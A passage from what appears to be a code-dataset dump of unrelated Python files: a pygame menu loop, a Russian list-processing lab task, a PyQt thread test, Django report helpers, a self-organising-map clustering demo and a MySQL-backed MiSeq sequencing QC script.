Game\",\n action=GameState.SHEEP,\n )\n\n quit_btn = UIElement(\n center_position=(400, 600),\n font_size=30,\n bg_rgb=BLUE,\n text_rgb=WHITE,\n text=\"Quit\",\n action=GameState.QUIT,\n )\n\n buttons = [start_bucket, start_lion, start_sheep, quit_btn, create_bucket]\n clickables = pygame.sprite.RenderUpdates(buttons)\n\n clock = pygame.time.Clock()\n\n while True:\n clock.tick(15)\n\n mouse_up = False\n\n for event in pygame.event.get():\n if event.type == QUIT:\n return GameState.QUIT\n elif event.type == pygame.MOUSEBUTTONUP and event.button == 1:\n mouse_up = True\n\n screen.fill(BLUE)\n\n for button in buttons:\n ui_action = button.update(pygame.mouse.get_pos(), mouse_up)\n\n if ui_action is not None:\n return ui_action\n\n clickables.draw(screen)\n pygame.display.flip()\n\n\ndef win_screen(screen):\n image = load_image('youwin.jpg')\n sound = load_sound('winning.wav')\n sound.play()\n clock = pygame.time.Clock()\n\n while True:\n clock.tick(15)\n\n for event in pygame.event.get():\n if event.type == KEYDOWN and event.key == K_ESCAPE:\n return GameState.TITLE\n\n screen.fill(BLUE)\n screen.blit(image, (150, 150))\n pygame.display.flip()\n\n\ndef 
lose_screen(screen):\n image = load_image('youlose.jpg')\n sound = load_sound('loosing.wav')\n sound.play()\n clock = pygame.time.Clock()\n\n while True:\n clock.tick(15)\n\n for event in pygame.event.get():\n if event.type == KEYDOWN and event.key == K_ESCAPE:\n return GameState.TITLE\n\n screen.fill(BLUE)\n screen.blit(image, (150, 150))\n pygame.display.flip()\n\n\ndef main():\n pygame.init()\n pygame.mixer.pre_init(44100, 16, 2, 4096)\n\n screen = pygame.display.set_mode((WIDTH, HEIGHT))\n pygame.display.set_caption('Minizinc Fever')\n\n game_state = GameState.TITLE\n\n clock = pygame.time.Clock()\n\n while True:\n clock.tick(15)\n\n if game_state == GameState.TITLE:\n game_state = title_screen(screen)\n\n if game_state == GameState.BUCKET:\n path = find_file()\n game_state = gameBucket(screen, path)\n screen = pygame.display.set_mode((WIDTH, HEIGHT))\n pygame.mouse.set_visible(1)\n\n if game_state == GameState.CREATE:\n conf = CreateConfigSeaux()\n conf.start()\n game_state = GameState.TITLE\n\n if game_state == GameState.LION:\n path = find_file()\n game_state = gameLion(screen, path)\n screen = pygame.display.set_mode((WIDTH, HEIGHT))\n pygame.mouse.set_visible(1)\n\n if game_state == GameState.SHEEP:\n game_state = gameSheep(screen)\n screen = pygame.display.set_mode((WIDTH, HEIGHT))\n pygame.mouse.set_visible(1)\n\n if game_state == GameState.WIN:\n game_state = win_screen(screen)\n\n if game_state == GameState.LOSE:\n game_state = lose_screen(screen)\n\n if game_state == GameState.QUIT:\n pygame.quit()\n return\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
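GameState is imported from utils.enum and not shown; a minimal definition consistent with the members used above would be:

from enum import Enum, auto

class GameState(Enum):
    QUIT = auto()
    TITLE = auto()
    BUCKET = auto()
    CREATE = auto()
    LION = auto()
    SHEEP = auto()
    WIN = auto()
    LOSE = auto()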
+{"seq_id":"646239302","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n#lab 5-2\n# 6. В списке, состоящем из целых элементов, вычислить:\n# 1) номер максимального элемента списка;\n# 2) произведение элементов списка, расположенных между первым и вторым нулевыми элементами.\n# Преобразовать список таким образом, чтобы в первой его половине располагались элементы,\n# стоявшие в нечетных позициях, а во второй половине - элементы, стоявшие в четных позициях.\n\nfrom functools import reduce\n\n\ninitlst = [int(i) for i in input('Введите список целых чисел через пробел ').split()]\nindmax = initlst.index(max(initlst)) # Получаем индекс максимального числа\nprint(f\"номер максимального элемента списка {indmax}.\")\nzeroelem = [i for i,d in enumerate(initlst) if d==0] # Плдучаем список индексов всех нулевых элементов\nif len(zeroelem) > 1:\n x = zeroelem[0]\n y = zeroelem[1]\n mlt = reduce(lambda x, y: x*y, initlst[x+1:y])\n print(f\"Произведение элементов списка, расположенных между первым и вторым нулевыми элементами: {mlt}\")\nelse:\n print(\"Нельзя получить произведение элементов между нулевыми элементами списка\")\nprint([x for i, x in enumerate(initlst) if not i%2] + [x for i, x in enumerate(initlst) if i%2])\n\n","sub_path":"lab5/task2.py","file_name":"task2.py","file_ext":"py","file_size_in_byte":1770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"425795144","text":"import unittest\nfrom quant.gui.gui_logic import ThreadWorker\nfrom PyQt5 import QtWidgets\nimport sys,traceback\n\n\nclass MyWidget(QtWidgets.QWidget):\n def __init__(self):\n super().__init__()\n\n self.btn = QtWidgets.QPushButton('test',self)\n self.btn.clicked.connect(self.clicked)\n\n self.edit = QtWidgets.QTextEdit(self)\n self.btn.move(10,10)\n self.edit.move(30,50)\n\n def clicked(self):\n print('clicked')\n self.thread = ThreadWorker()\n try:\n self.thread.signal.connect(self.callback)\n self.thread.start()\n except:\n traceback.print_exc()\n def callback(self):\n self.btn.setText('callback')\n self.edit.append('okok')\n\n\nclass TestGuiThread(unittest.TestCase):\n\n def test_gui(self):\n app = QtWidgets.QApplication(sys.argv)\n win = MyWidget()\n\n win.show()\n app.exec_()","sub_path":"quant/gui/tests/test_gui_thread.py","file_name":"test_gui_thread.py","file_ext":"py","file_size_in_byte":913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"267891095","text":"import pkgutil\nimport inspect\n\nfrom django.shortcuts import render_to_response\nfrom django.template import RequestContext\n\nimport accountifie.toolkit.utils as utils\nfrom models import ReportDef\n\n\ndef get_report(rpt_id, company_id, version=None):\n try:\n report = ReportDef.objects.get(name=rpt_id)\n rpt_path = report.path\n rpt_name = report.name\n except:\n return None\n \n loader = pkgutil.get_loader(rpt_path)\n module = loader.load_module(rpt_path)\n \n rpt = None\n for name,obj in inspect.getmembers(module):\n if name == rpt_name:\n rpt = obj(company_id)\n break\n \n return rpt\n\n\ndef get_report_cols(path_name, company_ID,as_of=None, col_tag=None):\n rpt = get_report(path_name, company_ID)\n if as_of:\n rpt.config_fromdate(as_of)\n elif col_tag:\n rpt.config_fromtag(col_tag)\n else:\n rpt.config_fromdate('today')\n\n return rpt.columns, rpt.column_order\n\n\ndef report_prep(request, id):\n as_of = request.GET.get('date', None)\n col_tag = request.GET.get('col_tag', None)\n\n format = request.GET.get('format', 'html')\n company_ID = request.GET.get('company', utils.get_company(request))\n path = request.GET.get('path', None)\n report = get_report(id, company_ID)\n gl_strategy = request.GET.get('gl_strategy', None)\n\n if report is None:\n msg = \"Report %s does not exist\" % id\n return render_to_response('rpt_doesnt_exist.html', RequestContext(request, {'message': msg})), False, None\n\n if company_ID not in report.works_for:\n msg = \"This ain't it. Report not available for %s\" % report.company_name\n return render_to_response('rpt_doesnt_exist.html', RequestContext(request, {'message': msg})), False\n\n report.configure(as_of=as_of, col_tag=col_tag, path=path)\n report.set_gl_strategy(gl_strategy)\n return report, True, format\n\n\n","sub_path":"accountifie/reporting/rptutils.py","file_name":"rptutils.py","file_ext":"py","file_size_in_byte":1899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"176428900","text":"import csv\nimport pygame\nimport random\nimport numpy as np\nimport time\nfrom sklearn import metrics\nfrom sklearn.cluster import KMeans\nimport hexagons\nimport matplotlib.pyplot as plt\n\nWINDOW_W=1000\nWINDOW_H=1000\n\nclass Dot:\n def __init__(self, cluster, coords):\n self.cluster = cluster\n self.c = np.array(coords)\n\nclass Node:\n def __init__(self, xy, dim):\n self.c = np.array(xy)\n\n w = []\n for _ in range(dim):\n w.append(random.uniform(-1, 1))\n self.w = np.array(w)\n\n def dist(self, dot):\n return np.linalg.norm(self.w - dot.c)\n\n def dist_to_node(self, node):\n return np.linalg.norm(self.w - node.w)\n\n def __str__(self):\n return \"({},{}):{}\".format(self.c[0], self.c[1], self.w)\n\n def __repr__(self):\n return self.__str__()\n\nclass SOM:\n def __init__(self, nrows, ncols, dim):\n nodes = []\n\n cur_x = 0\n cur_y = 0\n for r in range(nrows):\n new_row = []\n for c in range(ncols):\n new_row.append(Node((cur_x, cur_y), dim))\n cur_x += 1\n nodes.append(new_row)\n cur_x = 0\n cur_y += 1\n\n self.nodes = np.array(nodes)\n\n self.train_number = 1\n\n def train(self, dataset):\n cur_sigma = self.sigma()\n cur_nu = self.nu()\n cur_sigma = (2*cur_sigma**2)\n for _ in range(1):\n\n dot = np.random.choice(dataset)\n bmu = np.random.choice(np.ravel(self.nodes))\n bmu_dist = bmu.dist(dot)\n\n ns = np.ravel(self.nodes)\n # start = time.time()\n for n in ns:\n dist = n.dist(dot)\n if dist < bmu_dist:\n bmu = n\n bmu_dist = dist\n # end = time.time()\n # print('bmu', end-start)\n\n # start = time.time()\n for n in np.ravel(self.nodes):\n hij = np.exp(-((n.w-bmu.w)**2)/cur_sigma)\n n.w = n.w + cur_nu * hij * (dot.c - n.w)\n # end = time.time()\n # print('wei', end-start)\n bmu.w = bmu.w + cur_nu * (dot.c - bmu.w)\n\n self.train_number += 1\n\n def get_cluters(self, dataset, n_classes):\n nodes = self.nodes.ravel()\n counts = {node:0 for node in nodes}\n for p in dataset:\n d = 9999999\n cur = -1\n for w in nodes:\n dd = w.dist(p)\n if dd < d:\n d = dd\n cur = w\n counts[cur] += 1\n import operator\n centers = dict(sorted(counts.items(), key=operator.itemgetter(1), reverse=True)[:3])\n\n clusters = [-1] * len(dataset)\n counter = 0\n for p in dataset:\n d = 99999\n cur = -1\n for c in range(len(centers)):\n dd = nodes[c].dist(p)\n if dd < d:\n d = dd\n cur = c\n clusters[counter] = cur\n counter += 1\n return clusters\n\n def sigma(self):\n sigma0 = 1\n const = 10\n a = self.train_number/const\n if a > 10:\n a = 10\n return sigma0 * np.exp(-(a))\n\n def nu(self):\n sigma0 = 1\n const = 2000\n a = self.train_number/const\n if a > 10:\n a = 10\n return sigma0 * np.exp(-(a))\n\nCOLS = 15\nROWS = 15\ns = SOM(ROWS,COLS,2)\n\npygame.init()\nscreen = pygame.display.set_mode((WINDOW_W, WINDOW_H))\nclock = pygame.time.Clock()\nFPS = 5\n\ndef toc(x, y):\n x1 = int(x * int(WINDOW_W/(ROWS-1)))\n y1 = int(y * int(WINDOW_H/(COLS-1)))\n return (x1, y1)\n\ndef toc_ds(x,y):\n x1 = int(x * int(WINDOW_W/2) + int(WINDOW_W/2))\n y1 = int(y * int(WINDOW_H/2) + int(WINDOW_H/2))\n return (x1, y1)\n\ndef draw_som(screen, som):\n rows = len(s.nodes)\n cols = len(s.nodes[0])\n for r in range(rows):\n for c in range(cols):\n # pygame.draw.circle(screen, pygame.Color(255,255,255), toc(r,c), 3)\n node = s.nodes[r,c]\n pygame.draw.circle(screen, pygame.Color(255,0,0), toc_ds(node.w[0],node.w[1]), 3)\n\ndataset = []\nwith open('2d_dataset.csv') as csvf:\n reader = csv.reader(csvf)\n for row in reader:\n cluster = row[0]\n coords = [float(c) for c in row[1:-1]]\n 
dataset.append(Dot(cluster, coords))\n    print(len(dataset))\n\ndef draw_dataset(screen, dataset):\n    for dot in dataset:\n        x,y = toc_ds(dot.c[0], dot.c[1])\n        pygame.draw.circle(screen, pygame.Color(0,125,125), (x,y), 3)\n\nrunning = True\ncounter = 0\nfig = plt.figure(1)\nwhile running:\n    # clock.tick(FPS)\n    for e in pygame.event.get():\n        if e.type == pygame.QUIT:\n            running = False\n        # if e.type == pygame.KEYDOWN:\n        #     if e.key == pygame.K_RETURN:\n        #         print('training')\n        #         for _ in range(100):\n        #             s.train(dataset)\n    if counter % 100 == 0:\n        print(\"counter\", counter)\n        screen.fill((0,0,0))\n        draw_dataset(screen, dataset)\n        draw_som(screen, s)\n        # centers = [[0.1,0.2,0.3]]\n        centers = [x.c for x in s.nodes.ravel()]\n        # weights = [[0.4,.3,.2]]\n        weights = [[(x.w[0]+1)/2, (x.w[1]+1)/2, 0.1] for x in s.nodes.ravel()]\n        # print(weights)\n        hexagons.plot_hex(fig, centers, weights)\n        plt.pause(0.001)\n        pygame.display.update()\n    # if counter == 0:\n    #     pygame.image.save(screen, \"images/som/som_00000_iter.png\")\n    # if counter == 100:\n    #     pygame.image.save(screen, \"images/som/som_00100_iter.png\")\n    # if counter == 1000:\n    #     pygame.image.save(screen, \"images/som/som_01000_iter.png\")\n    # if counter == 5000:\n    #     pygame.image.save(screen, \"images/som/som_05000_iter.png\")\n    # if counter == 10000:\n    #     pygame.image.save(screen, \"images/som/som_10000_iter.png\")\n    if counter == 15000:\n        # pygame.image.save(screen, \"images/som/som_15000_iter.png\")\n        running = False\n    # start = time.time()\n    s.train(dataset)\n    # print(s.get_cluters(dataset, 3))\n    # end = time.time()\n    # print('training', end - start)\n    counter += 1\nplt.show()\n# print(s.get_cluters(dataset, 3))\ndataset_clusters = [x.cluster for x in dataset]\npred_dataset = s.get_cluters(dataset, 3)\n# pred_dataset = [x.w for x in s.nodes.ravel()]\n# kmeans = KMeans(3).fit(pred_dataset)\n# print(kmeans.labels_)\n# pred_dataset = np.random.randint(0, 2, size=len(dataset))  # random baseline for debugging; enabling it scores random labels instead of the SOM clusters\n\nprint('Adjusted Rand score:', metrics.adjusted_rand_score(dataset_clusters, pred_dataset))\nprint('Mutual Information based score:', metrics.adjusted_mutual_info_score(dataset_clusters, pred_dataset))\nprint('V-measure score:', metrics.v_measure_score(dataset_clusters, pred_dataset))\nprint('Fowlkes-Mallows score:', metrics.fowlkes_mallows_score(dataset_clusters, pred_dataset))","sub_path":"som.py","file_name":"som.py","file_ext":"py","file_size_in_byte":6865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
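The per-node Python loop that locates the BMU dominates training time; the same search vectorised with numpy, assuming the node weights are stacked into one (n_nodes, dim) array (s and dataset as defined above):

import numpy as np

nodes = s.nodes.ravel()
weights = np.stack([n.w for n in nodes])             # (n_nodes, dim)
dot = dataset[0]                                     # example query point
distances = np.linalg.norm(weights - dot.c, axis=1)  # every node distance at once
bmu = nodes[int(np.argmin(distances))]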
+{"seq_id":"62989093","text":"'''\nCreated on 24 Jan 2016\n\n@author: Admin\n'''\n#Required imports\nfrom __future__ import print_function\nimport MySQLdb\nimport sys\nimport warnings\nimport numpy as np\nimport bisect\nimport scipy\nfrom scipy.optimize import curve_fit\nimport scipy.stats as stat\nimport matplotlib.pyplot as pl\nimport re\nfrom numpy import nan\n\n#'''\n###Write out stdout to a file\n#See if can redirect output to a file\nfile_loc = sys.path[0]\nfile_name = file_loc + \"\\\\outputs_log.txt\"\nsys.stdout = open(file_name, 'w')\n#'''\n#Load in a bunch of runs\n#Later on this will trigger from Matt's transfer program\n\n#Connect to the database- user with select privileges only\ntry:\n db = MySQLdb.connect(\"localhost\",sys.argv[1],sys.argv[2], \"ngsqc\" ) #Pass username and password as command line arguments\n\nexcept:\n sys.exit(\"Enter correct username and password!\")\n\ncursor = db.cursor()\n \n#Open the list of runs created with GenerateRunList.py\noutpath = sys.path[0]\noutpath = outpath + \"\\\\runs.txt\"\nfile_of_runs = open(outpath, 'r')\n\n#Import all runs from list of runs generated above- this is currently all of the runs in the database\nfor run in file_of_runs:\n #print(run) # Keep track of where we are\n run_for_import = run.rstrip() #Trailing newline /n means select otherwise doesn't work\n print(run_for_import) # Keep track of where we are\n #run_for_import = '160104_M02641_0062_000000000-AL603' #This is a test\n #run_for_import = '130405_M00766_0006_000000000-A3FNU' #This is a test\n #run_for_import = '130708_M00766_0023_000000000-A20R8' #This is a test\n #run_for_import = '140314_M00766_0027_000000000-A7C5E' #This is a test\n #run_for_import = '130206_M00766_0002_000000000-A23JM' #This is a test\n #run_for_import = '130510_M00766_0014_000000000-A3PFJ' #This is a test\n #How long is each read?\n sql_command = \"\"\" SELECT ReadNumber, NumberOfCycles, Indexed\n FROM Rds INNER JOIN LinkMiSeqRunRds\n ON Rds.ReadID = LinkMiSeqRunRds.ReadID\n WHERE LinkMiSeqRunRds.MiSeqRunID = \"\"\" + \"'\" + run_for_import + \"'\"\n cursor.execute(sql_command)\n reads_info = cursor.fetchall()\n reads_info_arr = np.array(reads_info)\n #Convert array from string type to integer type\n reads_info_arr_int = reads_info_arr.astype(int)\n #print(reads_info)\n #print(reads_info_arr)\n #print(reads_info_arr[:,1])\n\n ind_reads = 0\n\n for read_extract in reads_info_arr_int: \n #print(read_extract)\n if read_extract[2] == 0:\n #Read is not an index read\n #print(read_extract[1])\n if ((read_extract[0]) == 1 ) and (read_extract[1] == reads_info_arr_int[:,1].max()):\n #R1 is the first one\n read1_length = read_extract[1]\n #print(\"read 1 is \" + str(read1_length))\n else:\n #R2 is the last one\n read2_length = read_extract[1]\n #print(\"read 2 is \" + str(read2_length))\n elif read_extract[2] == 1:\n ind_reads += read_extract[1]\n #print(\"index is \" + str(ind_reads))\n else:\n raise Exception(\"Read is not properly identified as either not index or an index read\")\n #How many reads there are from this way of counting them (all index reads and R1 and R2)\n num_cycles_reads = sum(reads_info_arr_int[:,1])\n\n #Is the run complete?\n sql_command = \"\"\" SELECT MAX(ExtractionMetrics.CycleID)\n FROM ExtractionMetrics\n WHERE ExtractionMetrics.MiSeqRunID = \"\"\" + \"'\" + run_for_import + \"'\"\n cursor.execute(sql_command)\n current_run_extracted = cursor.fetchall()[0][0]\n #print(\"Extracted\")\n #print(current_run_extracted)\n \n if current_run_extracted == None:\n 
#warnings.warn(\"There is no InterOp data for this run\")\n print(\"There is no InterOp data for this run\")\n #Break out of the loop and go on with the next run\n continue\n\n sql_command = \"\"\" SELECT MAX(CorrectedIntMetrics.CycleID)\n FROM CorrectedIntMetrics\n WHERE CorrectedIntMetrics.MiSeqRunID = \"\"\" + \"'\" + run_for_import + \"'\"\n cursor.execute(sql_command)\n current_run_called = cursor.fetchall()[0][0]\n #print(\"Called\")\n #print(current_run_called)\n\n sql_command = \"\"\" SELECT MAX(QualityMetrics.CycleID)\n FROM QualityMetrics\n WHERE QualityMetrics.MiSeqRunID = \"\"\" + \"'\" + run_for_import + \"'\"\n cursor.execute(sql_command)\n current_run_scored = cursor.fetchall()[0][0]\n #print(\"Scored\")\n #print(current_run_scored)\n\n #Tests to ensure that the wrong bit will trigger- do one at a time\n #current_run_extracted = 2 #Pass test\n #current_run_called = 2 #Pass test\n #current_run_scored = 2 #Pass test\n\n ##Is the run complete\n ##Check that the total number of extracted matches the number of cycles from the reads- if not then there's a problem\n #Remove this for now so that code continues to execute\n ###assert current_run_extracted == num_cycles_reads\n ##Are the extracted, called and scored numbers equal? i.e. is run analysis complete\n if current_run_extracted != current_run_called == current_run_scored:\n #warnings.warn(\"Run \" + str(run_for_import) + \" incomplete\")\n print(\"Run analysis \" + str(run_for_import) + \" incomplete\")\n \n ##Are all the reagents in date from the run date?\n #Extract run date\n cursor.execute(\"\"\" SELECT MiSeqRun.RunStartDate\n FROM MiSeqRun\n WHERE MiSeqRun.MiSeqRunID = \"\"\" + \"'\" + run_for_import + \"'\")\n run_date = cursor.fetchall()[0][0]\n #print(run_date)\n \n ##Extract reagent dates\n cursor.execute(\"\"\" SELECT MiSeqRun.FlowCellExpiry, MiSeqRun.PR2BottleExpiry, MiSeqRun.ReagentKitExpiry \n FROM MiSeqRun\n WHERE MiSeqRun.MiSeqRunID = \"\"\" + \"'\" + run_for_import + \"'\")\n reagent_dates = cursor.fetchall()[0]\n #print(reagent_dates)\n for reagent_date in reagent_dates:\n #print(reagent_date)\n if (reagent_date < run_date):\n #warnings.warn(\"One of the run reagents or the flow cell was out of date\")\n print(\"One of the run reagents or the flow cell was out of date\")\n \n ##Extract version number of reagents\n cursor.execute(\"\"\" SELECT MiSeqRun.KitVersionNumber\n FROM MiSeqRun\n WHERE MiSeqRun.MiSeqRunID = \"\"\" + \"'\" + run_for_import + \"'\")\n kit_version = cursor.fetchall()[0][0]\n kt = str(kit_version)\n\n #Create a dictionary with threshold values for number of reads passing filter\n #Source: http://www.illumina.com/systems/miseq/performance_specifications.html\n threshold_reads = {(\"2\",\"SE\"):(12000000,15000000),(\"2\",\"PE\"):(24000000,30000000),(\"2\",\"SE\"):(22000000,25000000),(\"3\",\"PE\"):(44000000,50000000)}\n #print(threshold_reads)\n\n #Pull number of reads for entire run\n cursor.execute(\"\"\" SELECT SUM(Value) AS ReadsPerRun\n FROM TileMetrics\n WHERE TileMetrics.MiSeqRunID = \"\"\" + \"'\" + run_for_import + \"'\" \"\"\"\n AND TileMetrics.CodeID = '102'\n GROUP BY TileMetrics.MiSeqRunID \"\"\")\n #reads_per_run = cursor.fetchall()\n reads_per_run = cursor.fetchall()[0][0]\n #print(reads_per_run)\n reads_per_run = (int(reads_per_run))\n\n #Pull number of reads passing filter\n cursor.execute(\"\"\" SELECT SUM(Value) AS ReadsPerRunPF\n FROM TileMetrics\n WHERE TileMetrics.MiSeqRunID = \"\"\" + \"'\" + run_for_import + \"'\" \"\"\"\n AND TileMetrics.CodeID = '103'\n GROUP BY 
TileMetrics.MiSeqRunID \"\"\")\n reads_per_run_pf = cursor.fetchall()[0][0]\n reads_per_run_pf = (int(reads_per_run_pf))\n #print(reads_per_run_pf)\n\n #Work out proportion of runs \n proportion_reads_per_run_pf = (float(reads_per_run_pf))/(float(reads_per_run))\n #print(proportion_reads_per_run_pf)\n perc_reads_per_run_pf = (100*proportion_reads_per_run_pf)\n read_perc_threshold = 80 #Set the low threshold for reads passing filter\n\n #print(reads_per_run_pf)\n #print(reads_per_run)\n #print(perc_reads_per_run_pf)\n #Trigger warning if a low proportion/percentage of reads pass filter\n if perc_reads_per_run_pf < read_perc_threshold:\n #warnings.warn(\"Fewer than 80% of reads passing filter\")\n print(\"Fewer than 80% of reads passing filter\")\n \n #Retrieve the values associated with the kit version\n #All runs are with paired end reads!!! ASSUME PAIRED END FOR NOW\n #print(kit_version)\n threshold_reads_vals = threshold_reads.get((str(kit_version),\"PE\"))\n \n if threshold_reads_vals == None:\n #warnings.warn(\"No threshold read number available for kit version \" + kt)\n print(\"No threshold read number available for kit version \" + kt)\n #print(threshold_reads_vals)\n\n '''\n #Testing\n #reads_per_run_pf = 50\n reads_per_run_pf = 25000000\n #reads_per_run_pf = 50000000\n '''\n else:\n #if (reads_per_run_pf < threshold_reads_vals[0]) | (reads_per_run_pf > threshold_reads_vals[1]):\n #warnings.warn(\"Read count outside Illumina recommended range. Paired end sequencing assumed\")\n #print(\"Read count outside Illumina recommended range. Paired end sequencing assumed.\")\n if (reads_per_run_pf < threshold_reads_vals[0]):\n print(\"Read count lower than Illumina recommended range at \" + str(\"%.0f\" %reads_per_run_pf) + \" on a v\" + kt + \" kit. Paired end sequencing assumed.\")\n elif(reads_per_run_pf > threshold_reads_vals[1]):\n print(\"Read count higher than Illumina recommended range at \" + str(\"%.0f\" %reads_per_run_pf) + \"on a v\" + kt + \" kit. 
Paired end sequencing assumed.\")\n\n #Create a dictionary with threshold cluster densities for reagent version numbers\n #Values outside of these should generate a warning\n #Source https://my.illumina.com/MyIllumina/Bulletin/AH1453j-w0KpvCnZRqLYlA/cluster-density-specifications-for-illumina-sequen\n threshold_dens = {\"2\":(1000,1200),\"3\":(1200,1400)}\n #Set an outside value exceeding which generates an error\n outside_threshold_dens = {\"2\":(850,1250),\"3\":(1100,1500)}\n \n ##Cluster density\n cursor.execute(\"\"\" SELECT TileMetrics.TileID, TileMetrics.Value/1000 AS ClusterDensity\n FROM TileMetrics\n WHERE TileMetrics.CodeID = '100'\n AND TileMetrics.MiSeqRunID = \"\"\" + \"'\" + run_for_import + \"'\")\n cluster_density_full = cursor.fetchall()\n cluster_density_full_arr = np.array(cluster_density_full)\n #print(\"Cluster Density Data Full Extracted\")\n mean_dens = (np.mean(cluster_density_full_arr[:,1]))\n max_dens = (np.max(cluster_density_full_arr[:,1]))\n min_dens = (np.min(cluster_density_full_arr[:,1]))\n std_dens = (np.std(cluster_density_full_arr[:,1])) # This default does across axis=0 which is correct\n median_dens = (np.median(cluster_density_full_arr[:,1]))\n #print(std_dens)\n\n #print out the cluster density\n #print(str(mean_dens) + \" +/- \" + str(std_dens))\n\n ##Cluster density passing filter\n cursor.execute(\"\"\" SELECT TileMetrics.TileID, TileMetrics.Value/1000 AS ClusterDensity\n FROM TileMetrics\n WHERE TileMetrics.CodeID = '101'\n AND TileMetrics.MiSeqRunID = \"\"\" + \"'\" + run_for_import + \"'\")\n cluster_density_full_pf = cursor.fetchall()\n cluster_density_full_pf_arr = np.array(cluster_density_full_pf)\n #print(\"Cluster Density Data Full Passing Filter Extracted\")\n mean_dens_pf = (np.mean(cluster_density_full_pf_arr[:,1]))\n std_dens_pf = (np.std(cluster_density_full_pf_arr[:,1]))\n median_dens_pf = (np.median(cluster_density_full_pf_arr[:,1]))\n\n #Retrieve the values associated with the kit version\n threshold_vals_dens = threshold_dens.get(str(kit_version),None)\n outside_threshold_vals_dens = outside_threshold_dens.get(str(kit_version),None)\n \n #threshold_vals_dens = 10000 #Test triggering of below if clause with the 'or'\n \n if threshold_vals_dens == None or outside_threshold_vals_dens == None:\n #warnings.warn(\"No threshold cluster density available for kit version \" + kt)\n print(\"No threshold cluster density available for kit version \" + kt)\n #print(threshold_vals_dens)\n #print(outside_threshold_vals_dens)\n '''\n #Testing values\n #mean_dens_pf = 750\n #mean_dens_pf = 650\n #mean_dens_pf = 1000\n #mean_dens_pf = 1200\n '''\n else:\n cluster_d = str(\"%.2f\" %mean_dens_pf)\n #Checks for thresholding levels on cluster density\n if (mean_dens_pf < outside_threshold_vals_dens[0]):\n #raise Exception(\"Cluster density very low at \"+ cluster_d + \" on a v\" + kt + \" kit\")\n #Removed exception so that code doesn't stop executing when multiple runs go in\n #warnings.warn(\"Cluster density very low at \"+ cluster_d + \" on a v\" + kt + \" kit\")\n print(\"Cluster density passing filter very low at \"+ cluster_d + \" on a v\" + kt + \" kit\")\n elif (mean_dens_pf > outside_threshold_vals_dens[1]):\n #raise Exception(\"Cluster density very high at \"+ cluster_d + \" on a v\" + kt + \" kit\")\n #Removed exception so that code doesn't stop executing when multiple runs go in\n #warnings.warn(\"Cluster density very high at \"+ cluster_d + \" on a v\" + kt + \" kit\")\n print(\"Cluster density passing filter very high at \"+ cluster_d + \" 
on a v\" + kt + \" kit\")\n elif (mean_dens_pf < threshold_vals_dens[0]):\n #outside Illumina recommended thresholds\n #warnings.warn(\"Cluster density is low at \" + cluster_d + \" on a v\" + kt + \" kit\")\n print(\"Cluster density passing filter is low at \" + cluster_d + \" on a v\" + kt + \" kit\")\n elif (mean_dens_pf > threshold_vals_dens[1]):\n #outside Illumina recommended thresholds\n #warnings.warn(\"Cluster density is high at \" + cluster_d + \" on a v\" + kt + \" kit\")\n print(\"Cluster density passing filter is high at \" + cluster_d + \" on a v\" + kt + \" kit\")\n\n #Is there a big range in the cluster density?- this is over tiles and could indicate a problem with a tile\n #To use std dev or iqr? Start with std dev\n #Threshold for standard deviation\n #print((std_dens/mean_dens)*100) # This is the % of the mean that falls within 1 standard deviation\n #What is a high amount of % of the mean to fall outside of 1sd?\n #Set std threshold to that\n std_threshold = float(mean_dens)*0.05 #Pick the correct threshold value (gone for 5% of the mean here)- There was not really any need to do this as COV is already normalised\n threshold_COV_cluster_density = 0.05 # (5%)\n #print(mean_dens)\n #print(float(mean_dens))\n #print((std_dens/mean_dens))\n #print(float(mean_dens)*0.018159995802775248)\n #print(float(mean_dens)*0.05)\n #print(std_dens)\n\n #This is all great but why not have a go at the coefficient of variation, which is the standardised measure of dispersion\n COV_cluster_density = std_dens/mean_dens # Proportion of the mean that falls within 1 standard deviation\n #print(COV_cluster_density)\n #print(((std_dens/mean_dens)*100))\n #print(std_threshold)\n '''\n if ((std_dens/mean_dens)*100) > std_threshold: \n print(\"Large range in cluster densities. Possible issue with a tile.\")\n '''\n if COV_cluster_density > threshold_COV_cluster_density:\n #warnings.warn(\"Large range in cluster densities. Possible issue with a tile.\")\n print(\"Large range in cluster densities. Possible issue with a tile.\")\n\n #Is there a big gap between cluster density and cluster density passing filter?\n #If they are doing boxplots then it should be based on the median\n perc_diff_med_cd = (median_dens_pf/median_dens*100)\n #Working out a useful threshold- where would median be if was at a value of 'x'- here 85\n #print((float(85)/float(100))*float(median_dens))\n \n threshold_med_cd = 85 #Is this a useful threshold?\n \n if perc_diff_med_cd < threshold_med_cd:\n #warnings.warn(\"Low number of clusters passing filter\") \n print(\"Low number of clusters passing filter. 
